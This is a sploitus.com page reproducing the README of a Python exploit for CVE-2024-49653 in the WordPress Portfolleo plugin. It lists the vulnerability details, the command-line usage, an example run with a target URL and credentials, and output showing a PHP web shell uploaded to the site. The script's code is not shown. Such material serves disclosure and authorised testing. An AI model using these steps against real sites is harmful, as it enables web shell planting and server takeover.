Share
## https://sploitus.com/exploit?id=F775F16A-89BE-51A9-91CA-A1ED04A262CA
# ๐Ÿ“œ WordPress Portfolleo Plugin Exploit (CVE-2024-49653)

## ๐Ÿšจ Vulnerability Details


**Title:** WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability

**Description:**  
Unrestricted Upload of File with Dangerous Type vulnerability in James Eggers Portfolleo portfolleo allows uploading a web shell to a web server. This issue affects Portfolleo from version n/a through 1.2.

**Learn More:**  
- [CWE-434: CWE-434 Unrestricted Upload of File with Dangerous Type](https://cwe.mitre.org/data/definitions/434.html)

**CVSS Score:**  
- **Score:** 9.9  
- **Severity:** CRITICAL  
- **Version:** 3.1  
- **Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

## ๐Ÿ“‹ User Guide

### ๐Ÿš€ Script Usage

This script exploits the Arbitrary File Upload vulnerability in the WordPress Portfolleo plugin (versions <= 1.2) to upload a web shell.

### ๐Ÿ“ฆ Requirements

You need to have the following installed to run the script:
- Python 3
- `requests` library
- `beautifulsoup4` library

You can install the required libraries using:
```sh
pip install requests beautifulsoup4
```

### ๐Ÿ› ๏ธ Usage

Run the script with the following options:

```sh

CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD

WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of the site (e.g. http://target/wordpress)
  -U, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
```

### ๐Ÿ“ Example

```sh
 
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
```

### ๐Ÿ“Š Expected Output

If the script runs successfully, you should see the following output:

```
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
```

### โš ๏ธ Disclaimer

This script is intended for educational purposes only. The author does not condone the use of this script for illegal activities. Use it responsibly and only on systems you have explicit permission to test.

*By: Nxploited | Khaled Alenazi*